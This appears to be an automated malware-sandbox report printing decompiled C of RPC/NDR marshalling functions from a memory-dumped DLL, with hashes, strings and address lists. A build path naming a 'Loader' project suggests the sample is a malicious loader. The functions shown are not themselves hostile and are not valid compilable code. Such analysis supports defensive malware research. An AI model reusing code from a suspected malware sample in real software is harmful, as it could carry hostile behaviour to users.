                                                                                              • String ID: (%p,%p,%p)$buffer overflow %d bytes$buffer=%d/%d$difference = 0x%x
                                                                                              • API String ID: 1319815426-1841717460
                                                                                              • Opcode ID: bcc3e41eb6c43cd89d9ca243c03647130815eaa019938c8ec752e39fe169b312
                                                                                              • Instruction ID: ccf1049524eeadfabec85485ea86d0cfa06b1e93665ebda6a448287afeed988b
                                                                                              • Opcode Fuzzy Hash: bcc3e41eb6c43cd89d9ca243c03647130815eaa019938c8ec752e39fe169b312
                                                                                              • Instruction Fuzzy Hash: C5A1E8B4A00209EFCB08CF58C990AAEBBB5FF88354F148158ED599B355D731EA91CF90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 25%
                                                                                              			E6F7047D0(void* __eflags, intOrPtr* _a4, intOrPtr* _a8, intOrPtr _a12, signed int _a16) {
                                                                                              				intOrPtr _v8;
                                                                                              				signed int _v12;
                                                                                              				signed int _v16;
                                                                                              				signed int _v20;
                                                                                              				char _v48;
                                                                                              				void* _t183;
                                                                                              				void* _t186;
                                                                                              				void* _t187;
                                                                                              				void* _t188;
                                                                                              
                                                                                              				_v12 =  *(_a12 + (1 << 0)) & 0x000000ff;
                                                                                              				_v20 =  *(_a12 + (1 << 1)) & 0x0000ffff;
                                                                                              				_v16 =  *(_a12 + (1 << 2)) & 0x0000ffff;
                                                                                              				_v8 = 0;
                                                                                              				0x6f700000("(%p,%p,%p,%d)\n", _a4, _a8, _a12, _a16 & 0x000000ff);
                                                                                              				0x6f700000("index=%d\n", _v20);
                                                                                              				_t131 = _a4;
                                                                                              				E6F70E8C0(_a4, 2, _a12,  &_v48);
                                                                                              				_t186 = _t183 + 0x2c;
                                                                                              				if((_v12 & 0x000000c0) == 0) {
                                                                                              					E6F7073D0(_a4 + 4, _a4 + 4, (_v12 & 0x0000000f) + 1);
                                                                                              					_t187 = _t186 + 8;
                                                                                              				} else {
                                                                                              					E6F7073D0(_t131, _a4 + 4, 4);
                                                                                              					_t188 = _t186 + 8;
                                                                                              					 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 4)) + 4;
                                                                                              					_t153 = _a4;
                                                                                              					if( *((intOrPtr*)(_a4 + 0x34)) != 0) {
                                                                                              						_v8 =  *((intOrPtr*)(_a4 + 4));
                                                                                              						 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_a4 + 0x34));
                                                                                              						_t153 = _a4;
                                                                                              						 *((intOrPtr*)(_a4 + 0x34)) = 0;
                                                                                              					}
                                                                                              					E6F7073D0(_t153, _a4 + 4, 8);
                                                                                              					_t187 = _t188 + 8;
                                                                                              				}
                                                                                              				if((_a16 & 0x000000ff) == 0 &&  *_a8 == 0) {
                                                                                              					_a16 = 1;
                                                                                              				}
                                                                                              				if((_a16 & 0x000000ff) != 0) {
                                                                                              					 *_a8 =  *0x6f700000(_a4, _v16);
                                                                                              					E6F710730( *_a8, 0, _v16);
                                                                                              					_t187 = _t187 + 0xc;
                                                                                              				}
                                                                                              				 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x60)) + 0x38)) + (_v20 << 4) + 8))))( &_v48,  *((intOrPtr*)(_a4 + 4)),  *_a8);
                                                                                              				if(_v8 != 0) {
                                                                                              					do {
                                                                                              						0x6f700000("buffer=%d/%d\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)),  *((intOrPtr*)(_a4 + 0x14)));
                                                                                              						_t187 = _t187 + 0xc;
                                                                                              						if( *((intOrPtr*)(_a4 + 4)) >  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14))) {
                                                                                              							0x6f700000("buffer overflow %d bytes\n",  *((intOrPtr*)(_a4 + 4)) -  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14)));
                                                                                              							_t187 = _t187 + 8;
                                                                                              						}
                                                                                              					} while (0 != 0);
                                                                                              					 *((intOrPtr*)(_a4 + 0x34)) =  *((intOrPtr*)(_a4 + 4));
                                                                                              					 *((intOrPtr*)(_a4 + 4)) = _v8;
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: _memset
                                                                                              • String ID: (%p,%p,%p,%d)$buffer overflow %d bytes$buffer=%d/%d$index=%d
                                                                                              • API String ID: 2102423945-3620127348
                                                                                              • Opcode ID: 269ef0894036fbde52fb0b4dbbb9a24ea8be52dc4ccdb54796e9244407f31434
                                                                                              • Instruction ID: 8b903f1c70ea3859944aaec0c42e1ae477bec6ed7f04681a8c48ba54b0ce2cb5
                                                                                              • Opcode Fuzzy Hash: 269ef0894036fbde52fb0b4dbbb9a24ea8be52dc4ccdb54796e9244407f31434
                                                                                              • Instruction Fuzzy Hash: 4E710DB5A00208AFDB04DF58C994EAA7BB5FF88318F14C159ED499F385D731EA91CB90
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 16%
                                                                                              			E6F708700(void* __ecx, intOrPtr _a4, intOrPtr* _a8, signed char* _a12) {
                                                                                              				intOrPtr _v8;
                                                                                              				signed char* _t58;
                                                                                              				void* _t61;
                                                                                              				void* _t62;
                                                                                              
                                                                                              				0x6f700000("pStubMsg %p, pMemory %p, type 0x%02x\n", _a4, _a8,  *_a12 & 0x000000ff, __ecx);
                                                                                              				_t62 = _t61 + 0x10;
                                                                                              				if(( *_a12 & 0x000000ff) != 0x30) {
                                                                                              					0x6f700000("invalid format type %x\n",  *_a12 & 0x000000ff);
                                                                                              					_t62 = _t62 + 8;
                                                                                              					 *0x6f700000(0x6e6);
                                                                                              				}
                                                                                              				0x6f700000("flags: 0x%02x\n", _a12[1] & 0x000000ff);
                                                                                              				if(( *(_a4 + 0x20) & 0x000000ff) == 0) {
                                                                                              					__eflags = 1;
                                                                                              					_v8 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x60)) + 0x10)) + ( *(_a12 + (1 << 1)) & 0x000000ff) * 4));
                                                                                              				} else {
                                                                                              					_t58 = _a12;
                                                                                              					_t66 = _t58[1] & 0x80;
                                                                                              					if((_t58[1] & 0x80) == 0) {
                                                                                              						E6F702310(__eflags, _a4, _a8, 0);
                                                                                              					} else {
                                                                                              						E6F702310(_t66, _a4,  *_a8, 0);
                                                                                              					}
                                                                                              				}
                                                                                              				return 0;
                                                                                              			}








                                                                                              APIs
                                                                                              • _NdrClientContextMarshall@12.RGSBZEOG(?,?,00000000), ref: 6F708794
                                                                                              • _NdrClientContextMarshall@12.RGSBZEOG(?,?,00000000), ref: 6F7087A5
                                                                                              Strings
                                                                                              • pStubMsg %p, pMemory %p, type 0x%02x, xrefs: 6F708713
                                                                                              • invalid format type %x, xrefs: 6F708732
                                                                                              • flags: 0x%02x, xrefs: 6F70875A
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000006.00000002.310491203.000000006F701000.00000020.00020000.sdmp, Offset: 6F700000, based on PE: true
                                                                                              • Associated: 00000006.00000002.310482932.000000006F700000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310547268.000000006F71B000.00000002.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310581494.000000006F722000.00000040.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310606640.000000006F724000.00000008.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310624074.000000006F726000.00000004.00020000.sdmp
                                                                                              • Associated: 00000006.00000002.310636916.000000006F72A000.00000002.00020000.sdmp
                                                                                              Similarity
                                                                                              • API ID: ClientContextMarshall@12
                                                                                              • String ID: flags: 0x%02x$invalid format type %x$pStubMsg %p, pMemory %p, type 0x%02x
                                                                                              • API String ID: 935922980-1391298755
                                                                                              • Opcode ID: 1d5776425c8dc0659087306901d81bb7706b5ddf71f716d9ab33a1bff81edcca
                                                                                              • Instruction ID: a6549501f8793851710fbf1ece3498691110b705ef5ed15a6136af597d7937cc
                                                                                              • Opcode Fuzzy Hash: 1d5776425c8dc0659087306901d81bb7706b5ddf71f716d9ab33a1bff81edcca
                                                                                              • Instruction Fuzzy Hash: CA2195F5208294ABD704DF54D990FAA37E5BF89311F008569FD648B3C9D635EA10CBA0
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 49%
                                                                                              			E6F70D830(void* __ebx, void* __edi, void* __esi, signed int _a4, signed int _a8, signed int _a12, signed int _a16, signed int _a20, signed int _a24, signed int _a28) {
                                                                                              				signed int _v5;
                                                                                              				signed int _v12;
                                                                                              				signed int _v16;
                                                                                              				signed int _v20;
                                                                                              				signed int _v24;
                                                                                              				signed int _v28;
                                                                                              				signed int _v32;
                                                                                              				signed int _v36;
                                                                                              				signed int _v40;
                                                                                              				signed int _v44;
                                                                                              
                                                                                              				_v28 = _a4 & 0x000000ff;
                                                                                              				_v28 = _v28 - 0x1b;
                                                                                              				if(_v28 > 0xa) {
                                                                                              					L57:
                                                                                              					0x6f700000("unknown array format 0x%x\n", _a4 & 0x000000ff);
                                                                                              					return  *0x6f700000(0x6f7);
                                                                                              				}
                                                                                              				_t7 = _v28 + 0x6f70de1c; // 0xcccccc03
                                                                                              				switch( *((intOrPtr*)(( *_t7 & 0x000000ff) * 4 +  &M6F70DE08))) {
                                                                                              					case 0:
                                                                                              						_v12 =  *((intOrPtr*)(_a16 + 2));
                                                                                              						_v5 = ( *(_a16 + (1 << 0)) & 0x000000ff) + 1;
                                                                                              						_v24 = E6F70AEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
                                                                                              						_v16 = _v24;
                                                                                              						_a16 = E6F70A440(_a8, _a16 + 4);
                                                                                              						E6F7073D0(_a8 + 4, _a8 + 4, _v5 & 0x000000ff);
                                                                                              						_t298 = _t294 + 0x18;
                                                                                              						if((_a28 & 0x000000ff) == 0) {
                                                                                              							L11:
                                                                                              							return _v16;
                                                                                              						} else {
                                                                                              							if((_a20 & 0x000000ff) == 0) {
                                                                                              								__eflags = _a24 & 0x000000ff;
                                                                                              								if((_a24 & 0x000000ff) != 0) {
                                                                                              									_t250 = _a8;
                                                                                              									__eflags =  *(_t250 + 0x20) & 0x000000ff;
                                                                                              									if(( *(_t250 + 0x20) & 0x000000ff) == 0) {
                                                                                              										__eflags =  *_a12;
                                                                                              										if( *_a12 == 0) {
                                                                                              											 *_a12 =  *(_a8 + 4);
                                                                                              										}
                                                                                              									}
                                                                                              								}
                                                                                              							} else {
                                                                                              								_t252 = E6F70A3B0(_v24, _a8, _v24);
                                                                                              								_t298 = _t298 + 8;
                                                                                              								 *_a12 = _t252;
                                                                                              							}
                                                                                              							_v20 =  *(_a8 + 4);
                                                                                              							E6F70AF00(_a8, _v16);
                                                                                              							 *((intOrPtr*)(_a8 + 0x10)) = _v20;
                                                                                              							E6F70C2B0(_a8, _v20,  *_a12, _a16, _a20 & 0x000000ff);
                                                                                              							_push( *_a12);
                                                                                              							_push(_v20);
                                                                                              							_push("copying %p to %p\n");
                                                                                              							0x6f700000();
                                                                                              							if( *_a12 != _v20) {
                                                                                              								E6F7100E0( *_a12, _v20, _v16);
                                                                                              							}
                                                                                              							goto L11;
                                                                                              						}
                                                                                              					case 1:
                                                                                              						__eax = _a16;
                                                                                              						__cx =  *((intOrPtr*)(__eax + 2));
                                                                                              						_v12 =  *((intOrPtr*)(__eax + 2));
                                                                                              						1 = 1 << 0;
                                                                                              						__eax = _a16;
                                                                                              						 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) + 1;
                                                                                              						_v5 = __cl;
                                                                                              						_a16 = _a16 + 4;
                                                                                              						__eax = _a8;
                                                                                              						_a16 = E6F70A440(_a8, _a16 + 4);
                                                                                              						__ecx = _a8;
                                                                                              						__edx =  *(_a8 + 0x3c);
                                                                                              						__eax = _a16;
                                                                                              						__ecx = _a8;
                                                                                              						_a16 = E6F70A540(__ecx, __ecx, _a16,  *(_a8 + 0x3c));
                                                                                              						__edx = _v5 & 0x000000ff;
                                                                                              						_a8 = _a8 + 4;
                                                                                              						__eax = E6F7073D0(__ecx, _a8 + 4, _v5 & 0x000000ff);
                                                                                              						__ecx = _a8;
                                                                                              						__edx =  *(_a8 + 0x44);
                                                                                              						__eax = _v12 & 0x0000ffff;
                                                                                              						_v16 = E6F70AEC0(_v12 & 0x0000ffff,  *(_a8 + 0x44));
                                                                                              						__ecx = _a8;
                                                                                              						__edx =  *(_a8 + 0x3c);
                                                                                              						__eax = _v12 & 0x0000ffff;
                                                                                              						_v24 = E6F70AEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
                                                                                              						__ecx = _a28 & 0x000000ff;
                                                                                              						__eflags = _a28 & 0x000000ff;
                                                                                              						if((_a28 & 0x000000ff) != 0) {
                                                                                              							__edx = _a8;
                                                                                              							__eax =  *(__edx + 0x40);
                                                                                              							_v40 =  *(__edx + 0x40);
                                                                                              							__ecx = _a20 & 0x000000ff;
                                                                                              							__eflags = _a20 & 0x000000ff;
                                                                                              							if((_a20 & 0x000000ff) == 0) {
                                                                                              								__edx = _a12;
                                                                                              								__eflags =  *_a12;
                                                                                              								if( *_a12 == 0) {
                                                                                              									_a20 = 1;
                                                                                              								}
                                                                                              							}
                                                                                              							__eax = _a20 & 0x000000ff;
                                                                                              							__eflags = _a20 & 0x000000ff;
                                                                                              							if((_a20 & 0x000000ff) != 0) {
                                                                                              								__ecx = _v24;
                                                                                              								__edx = _a8;
                                                                                              								__eax = E6F70A3B0(_v24, _a8, _v24);
                                                                                              								__ecx = _a12;
                                                                                              								 *_a12 = __eax;
                                                                                              							}
                                                                                              							__edx = _a8;
                                                                                              							__eax =  *(__edx + 4);
                                                                                              							_v20 =  *(__edx + 4);
                                                                                              							__ecx = _v16;
                                                                                              							__edx = _a8;
                                                                                              							E6F70AF00(_a8, _v16) = _a8;
                                                                                              							__ecx = _v20;
                                                                                              							 *((intOrPtr*)(_a8 + 0x10)) = _v20;
                                                                                              							__edx = _a20 & 0x000000ff;
                                                                                              							__eax = _a16;
                                                                                              							__ecx = _a12;
                                                                                              							__edx =  *_a12;
                                                                                              							__eax = _v20;
                                                                                              							__ecx = _a8;
                                                                                              							__eax = E6F70C2B0(_a8, _v20,  *_a12, _a16, _a20 & 0x000000ff);
                                                                                              							__edx = _v16;
                                                                                              							__eax = _v20;
                                                                                              							__ecx = _a12;
                                                                                              							 *_a12 =  *_a12 + _v40;
                                                                                              							__eflags =  *_a12 + _v40;
                                                                                              							__eax = E6F7100E0( *_a12 + _v40, _v20, _v16);
                                                                                              						}
                                                                                              						__eax = _v16;
                                                                                              						return _v16;
                                                                                              					case 2:
                                                                                              						1 = 1 << 0;
                                                                                              						__eax = _a16;
                                                                                              						 *(__eax + (1 << 0)) & 0x000000ff = ( *(__eax + (1 << 0)) & 0x000000ff) + 1;
                                                                                              						_v5 = __cl;
                                                                                              						_a16 = _a16 + 4;
                                                                                              						__eax = _a8;
                                                                                              						_a16 = E6F70A440(_a8, _a16 + 4);
                                                                                              						__ecx = _a8;
                                                                                              						__edx =  *(_a8 + 0x3c);
                                                                                              						__eax = _a16;
                                                                                              						__ecx = _a8;
                                                                                              						_a16 = E6F70A540(_a8, _a8, _a16,  *(_a8 + 0x3c));
                                                                                              						__edx = _a16;
                                                                                              						_push(_a16);
                                                                                              						__eax = _a8;
                                                                                              						_push(_a8);
                                                                                              						0x6f700000();
                                                                                              						__esp = __esp + 8;
                                                                                              						_v12 = __ax;
                                                                                              						__ecx = _a8;
                                                                                              						__edx =  *(_a8 + 0x3c);
                                                                                              						__eax = _v12 & 0x0000ffff;
                                                                                              						_v24 = E6F70AEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
                                                                                              						__ecx = _a28 & 0x000000ff;
                                                                                              						__eflags = _a28 & 0x000000ff;
                                                                                              						if(__eflags == 0) {
                                                                                              							_push(0xab4);
                                                                                              							__eax = E6F70FA34(__ebx, __edx, __edi, __esi, __eflags, L"fUnmarshall", L"C:\\xampp\\htdocs\\Loct\\0f112985b53f4edb9cf175c98caa4d9d\\Loader\\Project4\\Project4\\Source.c");
                                                                                              						}
                                                                                              						__eax = _a20 & 0x000000ff;
                                                                                              						__eflags = _a20 & 0x000000ff;
                                                                                              						if((_a20 & 0x000000ff) == 0) {
                                                                                              							__ecx = _a12;
                                                                                              							__eflags =  *_a12;
                                                                                              							if( *_a12 == 0) {
                                                                                              								_a20 = 1;
                                                                                              							}
                                                                                              						}
                                                                                              						__edx = _a20 & 0x000000ff;
                                                                                              						__eflags = _a20 & 0x000000ff;
                                                                                              						if((_a20 & 0x000000ff) != 0) {
                                                                                              							__eax = _v24;
                                                                                              							__ecx = _a8;
                                                                                              							__eax = E6F70A3B0(_a8, _a8, _v24);
                                                                                              							__edx = _a12;
                                                                                              							 *_a12 = __eax;
                                                                                              						}
                                                                                              						__eax = _v5 & 0x000000ff;
                                                                                              						__ecx = _a8;
                                                                                              						__ecx = _a8 + 4;
                                                                                              						__eax = E6F7073D0(_a8 + 4, _a8 + 4, _v5 & 0x000000ff);
                                                                                              						__edx = _a8;
                                                                                              						__eax =  *(__edx + 4);
                                                                                              						_v20 =  *(__edx + 4);
                                                                                              						__ecx = _a12;
                                                                                              						__edx =  *_a12;
                                                                                              						_v36 =  *_a12;
                                                                                              						__eax = _a8;
                                                                                              						__ecx =  *(__eax + 0x44);
                                                                                              						_v44 =  *(__eax + 0x44);
                                                                                              						_v32 = 0;
                                                                                              						while(1) {
                                                                                              							__eax = _v32;
                                                                                              							__eflags = _v32 - _v44;
                                                                                              							if(_v32 >= _v44) {
                                                                                              								break;
                                                                                              							}
                                                                                              							__ecx = _a20 & 0x000000ff;
                                                                                              							__edx = _a16;
                                                                                              							__eax = _v36;
                                                                                              							__ecx = _a8;
                                                                                              							_v36 = E6F709560(_a8, _v36, _a16, 0, _a20 & 0x000000ff);
                                                                                              							__edx = _v32;
                                                                                              							__edx = _v32 + 1;
                                                                                              							__eflags = __edx;
                                                                                              							_v32 = __edx;
                                                                                              						}
                                                                                              						__edx = _a8;
                                                                                              						 *(__edx + 4) =  *(__edx + 4) - _v20;
                                                                                              						return  *(__edx + 4) - _v20;
                                                                                              					case 3:
                                                                                              						__eax = _a4 & 0x000000ff;
                                                                                              						__eflags = (_a4 & 0x000000ff) - 0x22;
                                                                                              						if((_a4 & 0x000000ff) != 0x22) {
                                                                                              							__edx = 2;
                                                                                              							_v12 = __dx;
                                                                                              						} else {
                                                                                              							__ecx = 1;
                                                                                              							_v12 = __cx;
                                                                                              						}
                                                                                              						__eax = _a8;
                                                                                              						__ecx =  *(_a8 + 0x3c);
                                                                                              						__edx = _a8;
                                                                                              						E6F70A540( *(_a8 + 0x3c), _a8, 0,  *(_a8 + 0x3c)) = 1;
                                                                                              						__eax = 1 << 0;
                                                                                              						__ecx = _a16;
                                                                                              						__edx =  *(__ecx + (1 << 0)) & 0x000000ff;
                                                                                              						__eflags = ( *(__ecx + (1 << 0)) & 0x000000ff) - 0x44;
                                                                                              						if(( *(__ecx + (1 << 0)) & 0x000000ff) != 0x44) {
                                                                                              							__eax = _a8;
                                                                                              							__ecx = _a8;
                                                                                              							__edx =  *(__eax + 0x3c);
                                                                                              							__eflags =  *(__eax + 0x3c) -  *((intOrPtr*)(__ecx + 0x44));
                                                                                              							if( *(__eax + 0x3c) !=  *((intOrPtr*)(__ecx + 0x44))) {
                                                                                              								__eax = _a8;
                                                                                              								__ecx =  *(__eax + 0x3c);
                                                                                              								_push( *(__eax + 0x3c));
                                                                                              								__edx = _a8;
                                                                                              								__eax =  *(__edx + 0x44);
                                                                                              								_push( *(__edx + 0x44));
                                                                                              								_push("buffer size %d must equal memory size %ld for non-sized conformant strings\n");
                                                                                              								0x6f700000();
                                                                                              								__esp = __esp + 0xc;
                                                                                              								_push(0x6c6);
                                                                                              								__eax =  *0x6f700000();
                                                                                              							}
                                                                                              						}
                                                                                              						__ecx = _a8;
                                                                                              						__eflags =  *(__ecx + 0x40);
                                                                                              						if( *(__ecx + 0x40) != 0) {
                                                                                              							__edx = _a8;
                                                                                              							__eax =  *(__edx + 0x40);
                                                                                              							_push( *(__edx + 0x40));
                                                                                              							_push("conformant strings can\'t have Offset (%d)\n");
                                                                                              							0x6f700000();
                                                                                              							__esp = __esp + 8;
                                                                                              							_push(0x6c6);
                                                                                              							__eax =  *0x6f700000();
                                                                                              						}
                                                                                              						__ecx = _a8;
                                                                                              						__edx =  *(_a8 + 0x3c);
                                                                                              						__eax = _v12 & 0x0000ffff;
                                                                                              						_v24 = E6F70AEC0(_v12 & 0x0000ffff,  *(_a8 + 0x3c));
                                                                                              						__ecx = _a8;
                                                                                              						__edx =  *(_a8 + 0x44);
                                                                                              						__eax = _v12 & 0x0000ffff;
                                                                                              						_v16 = E6F70AEC0(_v12 & 0x0000ffff,  *(_a8 + 0x44));
                                                                                              						__ecx = _v12 & 0x0000ffff;
                                                                                              						__edx = _v16;
                                                                                              						_a8 = E6F70B0C0(_v12 & 0x0000ffff, _a8, _v16, _v12 & 0x0000ffff);
                                                                                              						__ecx = _a28 & 0x000000ff;
                                                                                              						__eflags = _a28 & 0x000000ff;
                                                                                              						if((_a28 & 0x000000ff) == 0) {
                                                                                              							L44:
                                                                                              							__eax = _v16;
                                                                                              							return _v16;
                                                                                              						} else {
                                                                                              							__edx = _a20 & 0x000000ff;
                                                                                              							__eflags = _a20 & 0x000000ff;
                                                                                              							if((_a20 & 0x000000ff) == 0) {
                                                                                              								__eax = _a24 & 0x000000ff;
                                                                                              								__eflags = _a24 & 0x000000ff;
                                                                                              								if((_a24 & 0x000000ff) == 0) {
                                                                                              									L36:
                                                                                              									__ecx = _a12;
                                                                                              									__eflags =  *_a12;
                                                                                              									if( *_a12 == 0) {
                                                                                              										__edx = _v24;
                                                                                              										_push(_v24);
                                                                                              										__eax = _a8;
                                                                                              										_push(_a8);
                                                                                              										__eax =  *0x6f700000();
                                                                                              										__ecx = _a12;
                                                                                              										 *_a12 = _a8;
                                                                                              									}
                                                                                              									L38:
                                                                                              									__edx = _a12;
                                                                                              									__eax = _a8;
                                                                                              									__ecx =  *_a12;
                                                                                              									__eflags =  *_a12 -  *((intOrPtr*)(__eax + 4));
                                                                                              									if( *_a12 !=  *((intOrPtr*)(__eax + 4))) {
                                                                                              										__ecx = _v16;
                                                                                              										__edx = _a12;
                                                                                              										__eax =  *_a12;
                                                                                              										__ecx = _a8;
                                                                                              										__eax = E6F70AFA0(_a8,  *_a12, _v16);
                                                                                              									} else {
                                                                                              										__edx = _v16;
                                                                                              										_a8 = E6F70AF00(_a8, _v16);
                                                                                              									}
                                                                                              									__edx = _a16;
                                                                                              									__eax =  *_a16 & 0x000000ff;
                                                                                              									__eflags = __eax - 0x22;
                                                                                              									if(__eax != 0x22) {
                                                                                              										__eax = _a12;
                                                                                              										__ecx =  *__eax;
                                                                                              										_push( *__eax);
                                                                                              										0x6f700000();
                                                                                              										__esp = __esp + 4;
                                                                                              										_push(__eax);
                                                                                              										_push("string=%s\n");
                                                                                              										0x6f700000();
                                                                                              										__esp = __esp + 8;
                                                                                              									} else {
                                                                                              										__ecx = _a12;
                                                                                              										__edx =  *_a12;
                                                                                              										_push( *_a12);
                                                                                              										0x6f700000();
                                                                                              										__esp = __esp + 4;
                                                                                              										_push(__eax);
                                                                                              										_push("string=%s\n");
                                                                                              										0x6f700000();
                                                                                              										__esp = __esp + 8;
                                                                                              									}
                                                                                              									goto L44;
                                                                                              								}
                                                                                              								__ecx = _a8;
                                                                                              								__edx =  *(__ecx + 0x20) & 0x000000ff;
                                                                                              								__eflags =  *(__ecx + 0x20) & 0x000000ff;
                                                                                              								if(( *(__ecx + 0x20) & 0x000000ff) != 0) {
                                                                                              									goto L36;
                                                                                              								}
                                                                                              								__eax = _a12;
                                                                                              								__eflags =  *_a12;
                                                                                              								if( *_a12 != 0) {
                                                                                              									goto L36;
                                                                                              								}
                                                                                              								__ecx = _a8;
                                                                                              								__edx = _a8;
                                                                                              								__eax =  *(__ecx + 0x3c);
                                                                                              								__eflags =  *(__ecx + 0x3c) -  *(__edx + 0x44);
                                                                                              								if( *(__ecx + 0x3c) !=  *(__edx + 0x44)) {
                                                                                              									goto L36;
                                                                                              								}
                                                                                              								__ecx = _a12;
                                                                                              								__edx = _a8;
                                                                                              								__eax =  *(__edx + 4);
                                                                                              								 *_a12 =  *(__edx + 4);
                                                                                              								goto L38;
                                                                                              							}
                                                                                              							__eax = _v24;
                                                                                              							_push(_v24);
                                                                                              							__ecx = _a8;
                                                                                              							_push(_a8);
                                                                                              							__eax =  *0x6f700000();
                                                                                              							__edx = _a12;
                                                                                              							 *_a12 = _v24;
                                                                                              							goto L38;
                                                                                              						}
                                                                                              					case 4:
                                                                                              						goto L57;
                                                                                              				}
                                                                                              			}













                                                                                              0x6f70d9d6
                                                                                              0x6f70d9da
                                                                                              0x6f70d9e6
                                                                                              0x6f70d9e9
                                                                                              0x6f70d9f1
                                                                                              0x6f70d9f5
                                                                                              0x6f70d9fd
                                                                                              0x6f70da00
                                                                                              0x6f70da04
                                                                                              0x6f70da11
                                                                                              0x6f70da14
                                                                                              0x6f70da17
                                                                                              0x6f70da1b
                                                                                              0x6f70da28
                                                                                              0x6f70da2b
                                                                                              0x6f70da2f
                                                                                              0x6f70da31
                                                                                              0x6f70da37
                                                                                              0x6f70da3a
                                                                                              0x6f70da3d
                                                                                              0x6f70da40
                                                                                              0x6f70da44
                                                                                              0x6f70da46
                                                                                              0x6f70da48
                                                                                              0x6f70da4b
                                                                                              0x6f70da4e
                                                                                              0x6f70da50
                                                                                              0x6f70da50
                                                                                              0x6f70da4e
                                                                                              0x6f70da54
                                                                                              0x6f70da58
                                                                                              0x6f70da5a
                                                                                              0x6f70da5c
                                                                                              0x6f70da60
                                                                                              0x6f70da64
                                                                                              0x6f70da6c
                                                                                              0x6f70da6f
                                                                                              0x6f70da6f
                                                                                              0x6f70da71
                                                                                              0x6f70da74
                                                                                              0x6f70da77
                                                                                              0x6f70da7a
                                                                                              0x6f70da7e
                                                                                              0x6f70da8a
                                                                                              0x6f70da8d
                                                                                              0x6f70da90
                                                                                              0x6f70da93
                                                                                              0x6f70da98
                                                                                              0x6f70da9c
                                                                                              0x6f70da9f
                                                                                              0x6f70daa2
                                                                                              0x6f70daa6
                                                                                              0x6f70daaa
                                                                                              0x6f70dab2
                                                                                              0x6f70dab6
                                                                                              0x6f70daba
                                                                                              0x6f70dabf
                                                                                              0x6f70dabf
                                                                                              0x6f70dac3
                                                                                              0x6f70dac8
                                                                                              0x6f70dacb
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f70dcb9
                                                                                              0x6f70dcbc
                                                                                              0x6f70dcc3
                                                                                              0x6f70dcc6
                                                                                              0x6f70dccc
                                                                                              0x6f70dcd0
                                                                                              0x6f70dcdc
                                                                                              0x6f70dcdf
                                                                                              0x6f70dce2
                                                                                              0x6f70dce6
                                                                                              0x6f70dcea
                                                                                              0x6f70dcf6
                                                                                              0x6f70dcf9
                                                                                              0x6f70dcfc
                                                                                              0x6f70dcfd
                                                                                              0x6f70dd00
                                                                                              0x6f70dd01
                                                                                              0x6f70dd06
                                                                                              0x6f70dd09
                                                                                              0x6f70dd0d
                                                                                              0x6f70dd10
                                                                                              0x6f70dd14
                                                                                              0x6f70dd21
                                                                                              0x6f70dd24
                                                                                              0x6f70dd28
                                                                                              0x6f70dd2a
                                                                                              0x6f70dd2c
                                                                                              0x6f70dd3b
                                                                                              0x6f70dd40
                                                                                              0x6f70dd43
                                                                                              0x6f70dd47
                                                                                              0x6f70dd49
                                                                                              0x6f70dd4b
                                                                                              0x6f70dd4e
                                                                                              0x6f70dd51
                                                                                              0x6f70dd53
                                                                                              0x6f70dd53
                                                                                              0x6f70dd51
                                                                                              0x6f70dd57
                                                                                              0x6f70dd5b
                                                                                              0x6f70dd5d
                                                                                              0x6f70dd5f
                                                                                              0x6f70dd63
                                                                                              0x6f70dd67
                                                                                              0x6f70dd6f
                                                                                              0x6f70dd72
                                                                                              0x6f70dd72
                                                                                              0x6f70dd74
                                                                                              0x6f70dd79
                                                                                              0x6f70dd7c
                                                                                              0x6f70dd80
                                                                                              0x6f70dd88
                                                                                              0x6f70dd8b
                                                                                              0x6f70dd8e
                                                                                              0x6f70dd91
                                                                                              0x6f70dd94
                                                                                              0x6f70dd96
                                                                                              0x6f70dd99
                                                                                              0x6f70dd9c
                                                                                              0x6f70dd9f
                                                                                              0x6f70dda2
                                                                                              0x6f70ddb4
                                                                                              0x6f70ddb4
                                                                                              0x6f70ddb7
                                                                                              0x6f70ddba
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x6f70ddbc
                                                                                              0x6f70ddc3
                                                                                              0x6f70ddc7
                                                                                              0x6f70ddcb
                                                                                              0x6f70ddd7
                                                                                              0x6f70ddab
                                                                                              0x6f70ddae
                                                                                              0x6f70ddae
